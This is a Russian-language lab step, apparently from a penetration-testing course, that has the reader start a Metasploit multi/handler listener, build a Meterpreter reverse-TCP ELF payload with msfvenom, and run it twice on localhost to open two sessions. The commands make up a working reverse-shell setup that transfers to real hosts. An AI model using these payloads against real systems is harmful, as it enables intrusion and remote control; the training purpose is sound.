Получение нескольких сессий Meterpreter или shell
На этом шаге вы настроите прослушиватель (listener) в Metasploit, а затем выполните полезную нагрузку (payload) для создания двух отдельных сессий Meterpreter. Это имитирует получение доступа к двум различным системам.
Сначала откройте терминал и запустите консоль Metasploit Framework. Флаг -q позволяет запустить ее в тихом режиме, без отображения баннера.
msfconsole -q
Далее мы настроим универсальный прослушиватель, называемый multi/handler, для ожидания входящих соединений.
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
Теперь запустите прослушиватель как фоновую задачу, используя флаг -j. Это позволит сохранить доступным приглашение msfconsole для других команд, пока прослушиватель работает в фоновом режиме.
run -j
Вы должны увидеть подтверждение того, что обработчик запущен.
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 127.0.0.1:4444
Теперь вам нужно сгенерировать и выполнить полезную нагрузку, которая подключится обратно к этому прослушивателю. Откройте новую, вторую вкладку терминала, нажав значок + в окне терминала.
В этом новом терминале используйте msfvenom для создания полезной нагрузки. Эта команда генерирует исполняемый файл ELF, который при запуске подключится обратно к нашему прослушивателю.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o ~/project/payload.elf
Сделайте сгенерированный файл полезной нагрузки исполняемым:
chmod +x ~/project/payload.elf
Теперь выполните полезную нагрузку дважды, чтобы создать две сессии. Мы запускаем их как фоновые процессы (&), чтобы вы могли немедленно выполнить команду снова.
./payload.elf &
./payload.elf &
Вернитесь в первое окно терминала с msfconsole. Вы увидите сообщения, указывающие на то, что были открыты две сессии Meterpreter.
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:38998) at 2023-10-27 10:30:00 -0400
[*] Meterpreter session 2 opened (127.0.0.1:4444 -> 127.0.0.1:39000) at 2023-10-27 10:30:05 -0400
Теперь вы успешно установили две активные сессии.